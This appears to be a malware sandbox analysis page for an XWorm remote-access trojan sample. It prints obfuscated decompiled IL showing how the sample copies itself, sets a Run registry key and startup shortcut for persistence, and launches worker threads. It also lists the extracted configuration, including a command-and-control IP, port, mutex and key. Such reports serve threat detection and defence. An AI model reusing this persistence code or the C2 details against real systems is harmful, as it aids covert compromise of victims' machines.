vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::tLS2sXMIebLxXpGHwO60vF2sZBeKlpNG9bpWjB3j61mFgpuUdl0747qP1Mu8CFKHGjbbBHQGUieZDNOys call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::tLS2sXMIebLxXpGHwO60vF2sZBeKlpNG9bpWjB3j61mFgpuUdl0747qP1Mu8CFKHGjbbBHQGUieZDNOys ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::gqRTUDUHE660ayMqTszPtkarCkyaKVL1eLTifWUnhrK77mD8KxQheYTaXcdQb0zCxwgsa8b7OL0mLqc7A call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::gqRTUDUHE660ayMqTszPtkarCkyaKVL1eLTifWUnhrK77mD8KxQheYTaXcdQb0zCxwgsa8b7OL0mLqc7A ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::TSNgTOow9OdiAlvG3Wc3sQwkbmXhho4mH01Y18Fq0zKcdaLcckc08FEWtNT6Faes5deEZD1ClzJqfu2kh call System.Object Stub.UK15F8qQTxIEY5RORIhfHkQ::hVJpFHE2O1EoEvc0SZUAgEn(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::TSNgTOow9OdiAlvG3Wc3sQwkbmXhho4mH01Y18Fq0zKcdaLcckc08FEWtNT6Faes5deEZD1ClzJqfu2kh leave.s IL_00F3: call System.Boolean Stub.CxQLQp67FlPzepyxAIz3JLh::XbcwR50bqwic4uyssDrYvis() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00F3: call System.Boolean Stub.CxQLQp67FlPzepyxAIz3JLh::XbcwR50bqwic4uyssDrYvis() call System.Boolean Stub.CxQLQp67FlPzepyxAIz3JLh::XbcwR50bqwic4uyssDrYvis() brtrue.s IL_0100: ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::KwLeLniYNFAWNbZ9xY8OfbvLqPL2kx89FxjCGBKsRbUFQeY1y5X5LmbjZZ4ci08xR8t0481SMzQRoH17X ldstr \ ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0142: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.CxQLQp67FlPzepyxAIz3JLh::m2RT8UUL3RxTWamV90y8Kbg call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_0184: call My.St0YtaZcCoIBEGx3g2gwDEoB8I9Zs68HP6ZzqOtGcXnfiGtuVTjLYhwx35DjFgToUI4XgSnXmGlGBzhAv My.A7KCcGKxxKCWrUTypnK0zK8YviZypmjkewDEE6XfMfe3MbN3o3P6LEgu9KQ1ud51n3XXGo14SZSsqHUhU::yNeHGm7RhNINEVQNK9q1ZjsxB0vYmD6CHpi311rLSwULxGOmQg5qaxTLtTO7hidG8U8jkeCxtNDtJ0d2t() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0184: call My.St0YtaZcCoIBEGx3g2gwDEoB8I9Zs68HP6ZzqOtGcXnfiGtuVTjLYhwx35DjFgToUI4XgSnXmGlGBzhAv My.A7KCcGKxxKCWrUTypnK0zK8YviZypmjkewDEE6XfMfe3MbN3o3P6LEgu9KQ1ud51n3XXGo14SZSsqHUhU::yNeHGm7RhNINEVQNK9q1ZjsxB0vYmD6CHpi311rLSwULxGOmQg5qaxTLtTO7hidG8U8jkeCxtNDtJ0d2t() call My.St0YtaZcCoIBEGx3g2gwDEoB8I9Zs68HP6ZzqOtGcXnfiGtuVTjLYhwx35DjFgToUI4XgSnXmGlGBzhAv My.A7KCcGKxxKCWrUTypnK0zK8YviZypmjkewDEE6XfMfe3MbN3o3P6LEgu9KQ1ud51n3XXGo14SZSsqHUhU::yNeHGm7RhNINEVQNK9q1ZjsxB0vYmD6CHpi311rLSwULxGOmQg5qaxTLtTO7hidG8U8jkeCxtNDtJ0d2t() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_01BF: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BF: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String vMCgYFkGjodzKfsd4ZJAvmmyJMaN1PYEVnPUlCf34yRBNjCF4Rn1wZqNFjX6DJRE6y0d9lFx5ABezA2Jg::ucYppoUXsSIj5sPdCrhvNnnEHs4DJGCaI7LdnfBABHYAEhiHUccobf1cwlyPwaZfzFFcVS7hxhsX5btyS call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_8 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_10 ldloc.s V_10 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_10 stloc.s V_11 ldloc.s V_11 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_12 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_12 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0244: stloc.s V_13 ldloc.s V_11 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_8 stloc.s V_13 ldloc.s V_13 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_14 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_13 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_13 ldloc.s V_8 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.CxQLQp67FlPzepyxAIz3JLh::VkZ65RBHibBhVA3IsOvwdAs leave.s IL_02C3: call System.Void Stub.CxQLQp67FlPzepyxAIz3JLh::354oBC6Pe9ehzOjDJTMXL91() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02C3: call System.Void Stub.CxQLQp67FlPzepyxAIz3JLh::354oBC6Pe9ehzOjDJTMXL91() call System.Void Stub.CxQLQp67FlPzepyxAIz3JLh::354oBC6Pe9ehzOjDJTMXL91() ldnull <null> ldftn System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::tAUeArU6meXFnF1zccFnABpc7ExOxCONg4KK8qSdGfAtIBwhvQNIZNv0iVZp6EMVoslQYLQ2BpKhxWiuT() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.5BBIShPZnt1OyZUsa9XPUhM::5bEqYAf9a1d56ZHnqu7Rj7n() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02EF: call System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::1opzHsJVc6jsl2o16rfUdWLPnvsx0zmkdAPP7q5uao53B1TTaWbG4NCRl0bVBc0UD7gf6Lw6tNJUwswlz() call System.Void Stub.ahppRljXGH6ceBXxNs4sa86::himotjXW13itm3Xlf6UcjgS() call System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::1opzHsJVc6jsl2o16rfUdWLPnvsx0zmkdAPP7q5uao53B1TTaWbG4NCRl0bVBc0UD7gf6Lw6tNJUwswlz() ldnull <null> ldftn System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::AJ08oxrlTE2qbs4vwRgYzB7() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.ipvoGMbGliOdhPRymlSqAd7xJ7jw7b6qh8sjzj4cw02XnkdELBVlVCf9Tk01JbRIeJarRdHMl0pVFeGqw::JisAvS4CMWbA3Ku0DbalXtI() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Artefacts
Name
 Value
Mutex

Z7L0vtJ1EfwYHchh
CnC

108.181.154.141
Port

5555
c8ad61de141ffdca06e1282b1a828c9f (73.22 KB)
File Structure
c8ad61de141ffdca06e1282b1a828c9f
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

Z7L0vtJ1EfwYHchh
Hosts

108.181.154.141
Port

5555
KEY

<666666>
USBNM

<Xwormmm>
LoggerPath

%ProgramData%
family

xworm
Artefacts
Name
 Value Location
Mutex

Z7L0vtJ1EfwYHchh

Malicious

c8ad61de141ffdca06e1282b1a828c9f
CnC

108.181.154.141

Malicious

c8ad61de141ffdca06e1282b1a828c9f
Port

5555

Malicious

c8ad61de141ffdca06e1282b1a828c9f
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙